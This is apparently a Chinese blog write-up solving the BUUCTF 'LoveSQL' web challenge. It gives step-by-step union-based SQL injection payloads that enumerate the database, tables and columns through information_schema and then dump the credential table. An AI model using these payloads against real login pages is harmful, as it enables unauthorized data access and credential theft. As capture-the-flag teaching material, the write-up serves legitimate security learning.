buuctf-web-lovesql

打开靶场,访问题目:

buuctf-web-lovesql

万能密码尝试登录 ,得到了用户名和密码

buuctf-web-lovesql

buuctf-web-lovesql 尝试密码md5解密失败,还是回到注入的思路上

先在username处测试一下有没有注入点:这个题目username和password两个地方都可以作为注入点
?username=1' order by 1%23&password=ads

 buuctf-web-lovesql

 没有报错,只是说账号密码错误。直到order by 4的时候,报错了:

buuctf-web-lovesql

 4报错,说明3个字段,接下来开始寻找注入点:

联合注入

?username=1' union select 1,2,3%23&password=ads

buuctf-web-lovesql

很明显2和3都是注入点 ,我们查询当前所用的数据库名

?username=1' union select 1,database(),3%23&password=ads

得到数据库名:geek!

buuctf-web-lovesql 接着查询geek里的表名,最后用group_concat,将所有的表都显示出来

 ?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=ads
                               得到表名geekuser,l0ve1ysq1

  information_schema 这个库里包含了所有创建的库,表的信息 

buuctf-web-lovesql 然后查询列名:我先查的l0ve1ysq1,和题目一样,flag可能性大一点

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=ads

得到字段名id,username,password

然后查询这张表的内容得到flag

?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=ads

buuctf-web-lovesql

 

上一篇:node2vec之小黑尝试


下一篇:painter绘制初音未来漫画图文教程